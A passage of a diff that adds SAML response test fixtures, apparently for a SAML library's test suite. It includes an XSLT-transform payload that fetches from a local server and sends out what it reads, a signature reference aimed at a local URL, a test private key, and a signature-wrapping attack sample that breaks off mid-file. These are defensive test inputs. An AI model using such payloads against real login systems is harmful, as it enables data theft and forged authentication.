+<ds:KeyInfo><ds:X509Data><ds:X509Certificate>MIICgTCCAeoCCQCbOlrWDdX7FTANBgkqhkiG9w0BAQUFADCBhDELMAkGA1UEBhMCTk8xGDAWBgNVBAgTD0FuZHJlYXMgU29sYmVyZzEMMAoGA1UEBxMDRm9vMRAwDgYDVQQKEwdVTklORVRUMRgwFgYDVQQDEw9mZWlkZS5lcmxhbmcubm8xITAfBgkqhkiG9w0BCQEWEmFuZHJlYXNAdW5pbmV0dC5ubzAeFw0wNzA2MTUxMjAxMzVaFw0wNzA4MTQxMjAxMzVaMIGEMQswCQYDVQQGEwJOTzEYMBYGA1UECBMPQW5kcmVhcyBTb2xiZXJnMQwwCgYDVQQHEwNGb28xEDAOBgNVBAoTB1VOSU5FVFQxGDAWBgNVBAMTD2ZlaWRlLmVybGFuZy5ubzEhMB8GCSqGSIb3DQEJARYSYW5kcmVhc0B1bmluZXR0Lm5vMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDivbhR7P516x/S3BqKxupQe0LONoliupiBOesCO3SHbDrl3+q9IbfnfmE04rNuMcPsIxB161TdDpIesLCn7c8aPHISKOtPlAeTZSnb8QAu7aRjZq3+PbrP5uW3TcfCGPtKTytHOge/OlJbo078dVhXQ14d1EDwXJW1rRXuUt4C8QIDAQABMA0GCSqGSIb3DQEBBQUAA4GBACDVfp86HObqY+e8BUoWQ9+VMQx1ASDohBjwOsg2WykUqRXF+dLfcUH9dWR63CtZIKFDbStNomPnQz7nbK+onygwBspVEbnHuUihZq3ZUdmumQqCw4Uvs/1Uvq3orOo/WJVhTyvLgFVK2QarQ4/67OZfHd7R+POBXhophSMv1ZOo</ds:X509Certificate></ds:X509Data></ds:KeyInfo></ds:Signature><saml:Subject><saml:NameID SPNameQualifier="http://shard1.localdomain/saml2" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient">_3b3e7714b72e29dc4290321a075fa0b73333a4f25f</saml:NameID><saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"><saml:SubjectConfirmationData NotOnOrAfter="2012-08-03T20:12:15Z" Recipient="http://shard1.localdomain:3000/saml_consume" InResponseTo="d0016ec858d92360c597a01d155944f8df8fdb116d"/></saml:SubjectConfirmation></saml:Subject><saml:Conditions NotBefore="2012-08-03T20:06:45Z" NotOnOrAfter="2012-08-03T20:12:15Z"><saml:AudienceRestriction><saml:Audience>http://shard1.localdomain/saml2</saml:Audience></saml:AudienceRestriction></saml:Conditions><saml:AuthnStatement AuthnInstant="2012-08-03T20:07:15Z" SessionNotOnOrAfter="2012-08-04T04:07:15Z" SessionIndex="_02f26af30a37afb92081f3a73728810193efd7fa6e"><saml:AuthnContext><saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef></saml:AuthnContext></saml:AuthnStatement><saml:AttributeStatement><saml:Attribute Name="urn:oid:1.3.6.1.4.1.5923.1.1.1.1" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"><saml:AttributeValue xsi:type="xs:string">member</saml:AttributeValue></saml:Attribute><saml:Attribute Name="urn:oid:1.3.6.1.4.1.5923.1.1.1.6" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"><saml:AttributeValue xsi:type="xs:string">student@example.edu</saml:AttributeValue></saml:Attribute></saml:AttributeStatement></saml:Assertion></samlp:Response>

data/spec/fixtures/test4-response.xml ADDED Viewed

@@ -0,0 +1,57 @@
+<?xml version="1.0"?>
+<samlp:Response xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" ID="Rbd1ca4d500b80130b5178ada0d47c52294f418ad" Version="2.0" IssueInstant="2014-06-03T12:43:56Z" Destination="">
+ <saml:Issuer>https://app.example.com/saml/</saml:Issuer>
+ <samlp:Status>
+   <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
+ </samlp:Status>
+ <saml:Assertion xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" Version="2.0" ID="pfx9cb71b16-ad32-1735-fdcc-7a68b98ba9be" IssueInstant="2014-06-03T12:43:56Z">
+   <saml:Issuer>https://app.example.com/saml/</saml:Issuer>
+   <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
+     <ds:SignedInfo>
+       <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
+       <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
+       <ds:Reference URI="#pfx9cb71b16-ad32-1735-fdcc-7a68b98ba9be">
+         <ds:Transforms>
+           <ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
+           <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
+           <ds:Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116">
+             <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
+                 <xsl:template match="/">
+                     <xsl:variable name="exploit" select="document('http://127.0.0.1:2345/exploit')" />
+                     <xsl:variable name="exploitUrl" select="concat('http://127.0.0.1:2345/here',substring($exploit, 1, 5))" />
+                     <xsl:value-of select="document($exploitUrl)"/>
+                 </xsl:template>
+             </xsl:stylesheet>
+           </ds:Transform>
+         </ds:Transforms>
+         <ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/>
+         <ds:DigestValue>Q40aDbTJ0gA35qMt9bk6RLDaHM8=</ds:DigestValue>
+       </ds:Reference>
+     </ds:SignedInfo>
+     <ds:SignatureValue>evqiVwhRAqUlLxQrzmmKQ/TNVseqj4k0dO8CghneerLLW5mHqOPLQrAFyBgr8BK5
+gqmnFnm8a6rjSuqMj8xCTVGq4jXwz38WXx8iYCP1pQJASzWPFq9HicHoGVo9UT7a
+xyrTA51M+HswpueFnwE8anx0llBDNisxjZMX7ixdwc8=</ds:SignatureValue>
+     <ds:KeyInfo>
+       <ds:X509Data>
+         <ds:X509Certificate>MIIECDCCAvCgAwIBAgIUH1Nywt/+Cklv5RvuPPer8PNG7ggwDQYJKoZIhvcNAQEFBQAwUzELMAkGA1UEBhMCVVMxDDAKBgNVBAoMA3J1YjEVMBMGA1UECwwMT25lTG9naW4gSWRQMR8wHQYDVQQDDBZPbmVMb2dpbiBBY2NvdW50IDM1Mzc2MB4XDTEzMTEyNjE2MjgwN1oXDTE4MTEyNzE2MjgwN1owUzELMAkGA1UEBhMCVVMxDDAKBgNVBAoMA3J1YjEVMBMGA1UECwwMT25lTG9naW4gSWRQMR8wHQYDVQQDDBZPbmVMb2dpbiBBY2NvdW50IDM1Mzc2MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxINN52pg/eD9k4REEKq+1VQ+f7RxYVm0D2iTpJjFhBCi8jKhwMgQGqt/4x3iTx6i0swgi0xZIwMdsBlAB/83AFuXSK6hmZCY08zyM7x+wvj3EWwwC6fokvZvbb0PuIg7d4xgkMiSpDsCMg9XiDJytp8Obokmc0EPc0xEWdwIIwhPpy4TAdswcD5aTXnBn9fB/KRdmVR7VvnqCWqdTmOd3RxvvpcnLOHsycumGLVWukBNxHExALU6yTGMesJbg0fPhoN+MHxNYfe8NWBKFVEjdcvfVC9Ivemzj2xGDU1xMZ+v8uqt0pVV1LOmNcs5CvpMhZFSQFcu8dk77AAY2MJthQIDAQABo4HTMIHQMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFK2I7+srPutX2VzEnIwGmtCofTuhMIGQBgNVHSMEgYgwgYWAFK2I7+srPutX2VzEnIwGmtCofTuhoVekVTBTMQswCQYDVQQGEwJVUzEMMAoGA1UECgwDcnViMRUwEwYDVQQLDAxPbmVMb2dpbiBJZFAxHzAdBgNVBAMMFk9uZUxvZ2luIEFjY291bnQgMzUzNzaCFB9TcsLf/gpJb+Ub7jz3q/DzRu4IMA4GA1UdDwEB/wQEAwIHgDANBgkqhkiG9w0BAQUFAAOCAQEAnfgwE60ClcQ80b+GaFtEImzWlW7jIxpljSeRJ9Rbd6SSRxSck0Xwz17jtCnOaBeQ2igGyQfJA5R2OymaG9RqehGFdVEFbPC4OFwO1byUoGII9tReSKqtlemaEamgDLoYnnGVjFQ4/0EX4Ax2SjKNqwt+TgQykixfoo4GmCeFSSZnkoOEHUUWRDLqKK40AySnO8qA38g7fL+calsjqIcefy5Z5X1uybcFuif4IRvB6FpOMTPNj507cpCuqZw/sujVO+I00XD9VwuPT6TH9WerJp4Ye8J4HynADKsg6oJd61cqvQn33seNLIB/uA2U2uK/EY5c7m3I2VDgBDODbNZTng==</ds:X509Certificate>
+       </ds:X509Data>
+     </ds:KeyInfo>
+   </ds:Signature>
+   <saml:Subject>
+     <saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">user@example.com</saml:NameID>
+     <saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
+       <saml:SubjectConfirmationData NotOnOrAfter="2014-06-03T12:46:56Z" Recipient=""/>
+     </saml:SubjectConfirmation>
+   </saml:Subject>
+   <saml:Conditions NotBefore="2014-06-03T12:40:56Z" NotOnOrAfter="2014-06-03T12:46:56Z">
+     <saml:AudienceRestriction>
+       <saml:Audience/>
+     </saml:AudienceRestriction>
+   </saml:Conditions>
+   <saml:AuthnStatement AuthnInstant="2014-06-03T12:43:55Z" SessionNotOnOrAfter="2014-06-04T12:43:56Z" SessionIndex="_c01bb660-cd47-0131-de03-782bcb56fcaa">
+     <saml:AuthnContext>
+       <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml:AuthnContextClassRef>
+     </saml:AuthnContext>
+   </saml:AuthnStatement>
+ </saml:Assertion>
+</samlp:Response>

data/spec/fixtures/test5-response.xml ADDED Viewed

@@ -0,0 +1,48 @@
+<?xml version="1.0"?>
+<samlp:Response xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" ID="Rbd1ca4d500b80130b5178ada0d47c52294f418ad" Version="2.0" IssueInstant="2014-06-03T12:43:56Z" Destination="">
+ <saml:Issuer>https://app.example.com/saml/</saml:Issuer>
+ <samlp:Status>
+   <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
+ </samlp:Status>
+ <saml:Assertion xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" Version="2.0" ID="pfx9cb71b16-ad32-1735-fdcc-7a68b98ba9be" IssueInstant="2014-06-03T12:43:56Z">
+   <saml:Issuer>https://app.example.com/saml/</saml:Issuer>
+   <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
+     <ds:SignedInfo>
+       <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
+       <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
+       <ds:Reference URI="http://localhost:2345/myserverallday">
+         <ds:Transforms>
+           <ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
+           <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
+         </ds:Transforms>
+         <ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/>
+         <ds:DigestValue>Q40aDbTJ0gA35qMt9bk6RLDaHM8=</ds:DigestValue>
+       </ds:Reference>
+     </ds:SignedInfo>
+     <ds:SignatureValue>evqiVwhRAqUlLxQrzmmKQ/TNVseqj4k0dO8CghneerLLW5mHqOPLQrAFyBgr8BK5
+gqmnFnm8a6rjSuqMj8xCTVGq4jXwz38WXx8iYCP1pQJASzWPFq9HicHoGVo9UT7a
+xyrTA51M+HswpueFnwE8anx0llBDNisxjZMX7ixdwc8=</ds:SignatureValue>
+     <ds:KeyInfo>
+       <ds:X509Data>
+         <ds:X509Certificate>MIIECDCCAvCgAwIBAgIUH1Nywt/+Cklv5RvuPPer8PNG7ggwDQYJKoZIhvcNAQEFBQAwUzELMAkGA1UEBhMCVVMxDDAKBgNVBAoMA3J1YjEVMBMGA1UECwwMT25lTG9naW4gSWRQMR8wHQYDVQQDDBZPbmVMb2dpbiBBY2NvdW50IDM1Mzc2MB4XDTEzMTEyNjE2MjgwN1oXDTE4MTEyNzE2MjgwN1owUzELMAkGA1UEBhMCVVMxDDAKBgNVBAoMA3J1YjEVMBMGA1UECwwMT25lTG9naW4gSWRQMR8wHQYDVQQDDBZPbmVMb2dpbiBBY2NvdW50IDM1Mzc2MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxINN52pg/eD9k4REEKq+1VQ+f7RxYVm0D2iTpJjFhBCi8jKhwMgQGqt/4x3iTx6i0swgi0xZIwMdsBlAB/83AFuXSK6hmZCY08zyM7x+wvj3EWwwC6fokvZvbb0PuIg7d4xgkMiSpDsCMg9XiDJytp8Obokmc0EPc0xEWdwIIwhPpy4TAdswcD5aTXnBn9fB/KRdmVR7VvnqCWqdTmOd3RxvvpcnLOHsycumGLVWukBNxHExALU6yTGMesJbg0fPhoN+MHxNYfe8NWBKFVEjdcvfVC9Ivemzj2xGDU1xMZ+v8uqt0pVV1LOmNcs5CvpMhZFSQFcu8dk77AAY2MJthQIDAQABo4HTMIHQMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFK2I7+srPutX2VzEnIwGmtCofTuhMIGQBgNVHSMEgYgwgYWAFK2I7+srPutX2VzEnIwGmtCofTuhoVekVTBTMQswCQYDVQQGEwJVUzEMMAoGA1UECgwDcnViMRUwEwYDVQQLDAxPbmVMb2dpbiBJZFAxHzAdBgNVBAMMFk9uZUxvZ2luIEFjY291bnQgMzUzNzaCFB9TcsLf/gpJb+Ub7jz3q/DzRu4IMA4GA1UdDwEB/wQEAwIHgDANBgkqhkiG9w0BAQUFAAOCAQEAnfgwE60ClcQ80b+GaFtEImzWlW7jIxpljSeRJ9Rbd6SSRxSck0Xwz17jtCnOaBeQ2igGyQfJA5R2OymaG9RqehGFdVEFbPC4OFwO1byUoGII9tReSKqtlemaEamgDLoYnnGVjFQ4/0EX4Ax2SjKNqwt+TgQykixfoo4GmCeFSSZnkoOEHUUWRDLqKK40AySnO8qA38g7fL+calsjqIcefy5Z5X1uybcFuif4IRvB6FpOMTPNj507cpCuqZw/sujVO+I00XD9VwuPT6TH9WerJp4Ye8J4HynADKsg6oJd61cqvQn33seNLIB/uA2U2uK/EY5c7m3I2VDgBDODbNZTng==</ds:X509Certificate>
+       </ds:X509Data>
+     </ds:KeyInfo>
+   </ds:Signature>
+   <saml:Subject>
+     <saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">user@example.com</saml:NameID>
+     <saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
+       <saml:SubjectConfirmationData NotOnOrAfter="2014-06-03T12:46:56Z" Recipient=""/>
+     </saml:SubjectConfirmation>
+   </saml:Subject>
+   <saml:Conditions NotBefore="2014-06-03T12:40:56Z" NotOnOrAfter="2014-06-03T12:46:56Z">
+     <saml:AudienceRestriction>
+       <saml:Audience/>
+     </saml:AudienceRestriction>
+   </saml:Conditions>
+   <saml:AuthnStatement AuthnInstant="2014-06-03T12:43:55Z" SessionNotOnOrAfter="2014-06-04T12:43:56Z" SessionIndex="_c01bb660-cd47-0131-de03-782bcb56fcaa">
+     <saml:AuthnContext>
+       <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml:AuthnContextClassRef>
+     </saml:AuthnContext>
+   </saml:AuthnStatement>
+ </saml:Assertion>
+</samlp:Response>

data/spec/fixtures/test6-response.xml ADDED Viewed

@@ -0,0 +1,9 @@
+<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_641f919c529eb4b9c2c6447d577483256d45ac9c43" Version="2.0" IssueInstant="2014-09-16T22:15:53Z" Destination="http://shard-2.canvas.dev/saml_consume" InResponseTo="ffb009599eec994f0a4cbadbff1628f90695e44d22"><saml:Issuer>http://simplesamlphp.dev/simplesaml/saml2/idp/metadata.php</saml:Issuer><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
+  <ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
+    <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
+  <ds:Reference URI="#_641f919c529eb4b9c2c6447d577483256d45ac9c43"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/></ds:Transforms><ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/><ds:DigestValue>JjgISND0GviF1NMyrGHvCAAjQTE=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>sHnaxEHN/COmtv0AzcnLV5GT2iOp9jtIo3cLeyO/ByzytLlWr5T7SKUK9pl3vs1faLiFm/S5r62srB/nf7AWFG0VRGi2QXb/gqu9A0Bm1PnqTRAtHHxH1E8oVKadiNTP1GXtmYphCgnM3ZCW6g7wUt/uS8+7sU9Q1TOTAVPzNso=</ds:SignatureValue>
+<ds:KeyInfo><ds:X509Data><ds:X509Certificate>MIICgTCCAeoCCQCbOlrWDdX7FTANBgkqhkiG9w0BAQUFADCBhDELMAkGA1UEBhMCTk8xGDAWBgNVBAgTD0FuZHJlYXMgU29sYmVyZzEMMAoGA1UEBxMDRm9vMRAwDgYDVQQKEwdVTklORVRUMRgwFgYDVQQDEw9mZWlkZS5lcmxhbmcubm8xITAfBgkqhkiG9w0BCQEWEmFuZHJlYXNAdW5pbmV0dC5ubzAeFw0wNzA2MTUxMjAxMzVaFw0wNzA4MTQxMjAxMzVaMIGEMQswCQYDVQQGEwJOTzEYMBYGA1UECBMPQW5kcmVhcyBTb2xiZXJnMQwwCgYDVQQHEwNGb28xEDAOBgNVBAoTB1VOSU5FVFQxGDAWBgNVBAMTD2ZlaWRlLmVybGFuZy5ubzEhMB8GCSqGSIb3DQEJARYSYW5kcmVhc0B1bmluZXR0Lm5vMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDivbhR7P516x/S3BqKxupQe0LONoliupiBOesCO3SHbDrl3+q9IbfnfmE04rNuMcPsIxB161TdDpIesLCn7c8aPHISKOtPlAeTZSnb8QAu7aRjZq3+PbrP5uW3TcfCGPtKTytHOge/OlJbo078dVhXQ14d1EDwXJW1rRXuUt4C8QIDAQABMA0GCSqGSIb3DQEBBQUAA4GBACDVfp86HObqY+e8BUoWQ9+VMQx1ASDohBjwOsg2WykUqRXF+dLfcUH9dWR63CtZIKFDbStNomPnQz7nbK+onygwBspVEbnHuUihZq3ZUdmumQqCw4Uvs/1Uvq3orOo/WJVhTyvLgFVK2QarQ4/67OZfHd7R+POBXhophSMv1ZOo</ds:X509Certificate></ds:X509Data></ds:KeyInfo></ds:Signature><samlp:Status><samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/></samlp:Status><saml:Assertion xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema" ID="_3213cbee5db3b66a763035443e746877d161f0a7a5" Version="2.0" IssueInstant="2014-09-16T22:15:53Z"><saml:Issuer>http://simplesamlphp.dev/simplesaml/saml2/idp/metadata.php</saml:Issuer><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
+  <ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
+    <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
+  <ds:Reference URI="#_3213cbee5db3b66a763035443e746877d161f0a7a5"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/></ds:Transforms><ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/><ds:DigestValue>fVMHYHwOvYPwyftkUgdYe0MREmM=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>hVs09lhchv3LKLa/JHNUkDB8Ze7p8g+HFoZmim2vZzvO0DX6SBT9dYDyJgHSwpyfNUr5Ba70/4Sw9/uGFBjhCqe1oQ5VqbmZW34ugvvXShzcnt6v/8S4e2tgOpnUS3XfQwYLt8Rq4k1D9fr3SdWws5UGbt5pSYGGyYgY+1AB9ow=</ds:SignatureValue>
+<ds:KeyInfo><ds:X509Data><ds:X509Certificate>MIICgTCCAeoCCQCbOlrWDdX7FTANBgkqhkiG9w0BAQUFADCBhDELMAkGA1UEBhMCTk8xGDAWBgNVBAgTD0FuZHJlYXMgU29sYmVyZzEMMAoGA1UEBxMDRm9vMRAwDgYDVQQKEwdVTklORVRUMRgwFgYDVQQDEw9mZWlkZS5lcmxhbmcubm8xITAfBgkqhkiG9w0BCQEWEmFuZHJlYXNAdW5pbmV0dC5ubzAeFw0wNzA2MTUxMjAxMzVaFw0wNzA4MTQxMjAxMzVaMIGEMQswCQYDVQQGEwJOTzEYMBYGA1UECBMPQW5kcmVhcyBTb2xiZXJnMQwwCgYDVQQHEwNGb28xEDAOBgNVBAoTB1VOSU5FVFQxGDAWBgNVBAMTD2ZlaWRlLmVybGFuZy5ubzEhMB8GCSqGSIb3DQEJARYSYW5kcmVhc0B1bmluZXR0Lm5vMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDivbhR7P516x/S3BqKxupQe0LONoliupiBOesCO3SHbDrl3+q9IbfnfmE04rNuMcPsIxB161TdDpIesLCn7c8aPHISKOtPlAeTZSnb8QAu7aRjZq3+PbrP5uW3TcfCGPtKTytHOge/OlJbo078dVhXQ14d1EDwXJW1rRXuUt4C8QIDAQABMA0GCSqGSIb3DQEBBQUAA4GBACDVfp86HObqY+e8BUoWQ9+VMQx1ASDohBjwOsg2WykUqRXF+dLfcUH9dWR63CtZIKFDbStNomPnQz7nbK+onygwBspVEbnHuUihZq3ZUdmumQqCw4Uvs/1Uvq3orOo/WJVhTyvLgFVK2QarQ4/67OZfHd7R+POBXhophSMv1ZOo</ds:X509Certificate></ds:X509Data></ds:KeyInfo></ds:Signature><saml:Subject><saml:NameID SPNameQualifier="http://shard-2.canvas.dev/saml2" Format="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">testuser@example.com</saml:NameID><saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"><saml:SubjectConfirmationData NotOnOrAfter="2014-09-16T22:20:53Z" Recipient="http://shard-2.canvas.dev/saml_consume" InResponseTo="ffb009599eec994f0a4cbadbff1628f90695e44d22"/></saml:SubjectConfirmation></saml:Subject><saml:Conditions NotBefore="2014-09-16T22:15:23Z" NotOnOrAfter="2014-09-16T22:20:53Z"><saml:AudienceRestriction><saml:Audience>http://shard-2.canvas.dev/saml2</saml:Audience></saml:AudienceRestriction></saml:Conditions><saml:AuthnStatement AuthnInstant="2014-09-16T22:15:53Z" SessionNotOnOrAfter="2014-09-17T06:15:53Z" SessionIndex="_9f28445329a5ada29cca3cfae83a08d289d0816bc0"><saml:AuthnContext><saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef></saml:AuthnContext></saml:AuthnStatement><saml:AttributeStatement><saml:Attribute Name="uid" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"><saml:AttributeValue xsi:type="xs:string">testuser@example.com</saml:AttributeValue></saml:Attribute><saml:Attribute Name="email" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"><saml:AttributeValue xsi:type="xs:string">testuser@example.com</saml:AttributeValue></saml:Attribute><saml:Attribute Name="eduPersonAffiliation" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"><saml:AttributeValue xsi:type="xs:string">member</saml:AttributeValue></saml:Attribute><saml:Attribute Name="givenName" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"><saml:AttributeValue xsi:type="xs:string">Canvas</saml:AttributeValue></saml:Attribute><saml:Attribute Name="displayName" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"><saml:AttributeValue xsi:type="xs:string">Canvas Üser</saml:AttributeValue></saml:Attribute><saml:Attribute Name="surname" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"><saml:AttributeValue xsi:type="xs:string">Üser</saml:AttributeValue></saml:Attribute></saml:AttributeStatement></saml:Assertion></samlp:Response>

data/spec/fixtures/wrong-key.pem ADDED Viewed

@@ -0,0 +1,15 @@
+-----BEGIN RSA PRIVATE KEY-----
+MIICXQIBAAKBgQAAAAAAAAUARD2GBLow5+W1EW5LFgI2o4N0fAgJEFV6KPbEokdW
+rzHlLmfaxdDyIK+QilQqdtg3hU96zIFp8Dk9xnxJNYo1iIzZllrA+q95Dwf5sDTi
+oD3IHF2GL0CO1BhA6FX1d3ZuAaIwCI7G4Dw1PjBaUzHr99S9iwBJtHvD6QIDAQAB
+AoGBAIRISICh6o5yaCRn9T++lhkRsrmC40gqDW1E3rRgJoE91MSXO1hYI8/fFp81
+o8fpUNHQnCqDSAZ0xuB40cLbNTQzLS/z43Jf/LRVEF6EhAspv0iiN+M4NjWZKGaV
+f1dr7ByJgTzbawdUfI5we6YTeu2Titaynj0ujAzZV/UH0A71AkEA/gM+nEQoKu8M
+y2JgKfqjEfanMwFxvgdtz0xu1sLbpLh8ipQ1SvYpcsTIDTViOMT45uKE5Ov6zwla
+H2N5dJdhkwJBAM7wpuk3XX7+nHzYko2w5xm9C6858bqXhl37xJyyqeT5SCSa7+T0
+U91nZuumk3ZaTRdW5BCbcshX+Gyk/ZrOIhMCQBAxgMJRjgX+q2Aj62GBuvegM9SK
+mQe2TYfTpZVHYt1DbZ0gCa23t7i7Vs2Qw6w+0mdVtYcqjBi6zeYGX23RYMUCQCmf
+ohL6veWTVOqPrTquwG0e50DBiOudGrvArlVOYnnZ4jbqqyIEOvInoD357WM62pK9
+OXZVrgq6Fw/TR+dhWt0CQQCU2Aj4q96Uu8+NVUQ++cpi1hOJrlYzjMSu0BbEBGjb
+S1jxgEPxkHc8xZU2X3lr6FgjmlyLje3UaYRh870M1o3x
+-----END RSA PRIVATE KEY-----

data/spec/fixtures/xml_signature_wrapping_attack_duplicate_ids.xml ADDED Viewed

@@ -0,0 +1,11 @@
+<saml2p:Response xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol" ID="Rca160a86480551b76b463ee206bd8deeb47a11f8" IssueInstant="2014-02-01T13:48:10.831Z" Version="2.0"><saml2:Issuer xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">https://app.onelogin.com/saml/metadata/344357</saml2:Issuer><saml2p:Status><saml2p:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/><saml2p:StatusDetail><saml2:Assertion xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion" ID="pfx77d6c794-8295-f1c4-298e-c25ecae8046d" IssueInstant="2014-02-01T13:48:10.831Z" Version="2.0"><saml2:Issuer>https://app.onelogin.com/saml/metadata/344357</saml2:Issuer><saml2:Subject><saml2:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">evilnds1@gmail.com</saml2:NameID><saml2:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"><saml2:SubjectConfirmationData NotOnOrAfter="2014-02-01T13:51:10.831Z"/></saml2:SubjectConfirmation></saml2:Subject><saml2:Conditions NotBefore="2014-02-01T13:45:10.831Z" NotOnOrAfter="2014-02-01T13:51:10.831Z"><saml2:AudienceRestriction><saml2:Audience/></saml2:AudienceRestriction></saml2:Conditions><saml2:AuthnStatement AuthnInstant="2014-02-01T13:48:10.831Z" SessionIndex="_f918ae80-4092-0131-57de-782bcb56fcaa" SessionNotOnOrAfter="2014-02-01T14:48:10.831Z"><saml2:AuthnContext><saml2:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml2:AuthnContextClassRef></saml2:AuthnContext></saml2:AuthnStatement></saml2:Assertion></saml2p:StatusDetail></saml2p:Status><saml2:Assertion xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion" ID="pfx77d6c794-8295-f1c4-298e-c25ecae8046d" IssueInstant="2014-02-01T13:48:10.831Z" Version="2.0"><saml2:Issuer>https://app.onelogin.com/saml/metadata/344357</saml2:Issuer><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/><ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/><ds:Reference URI="#pfx77d6c794-8295-f1c4-298e-c25ecae8046d"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/></ds:Transforms><ds:DigestMethod 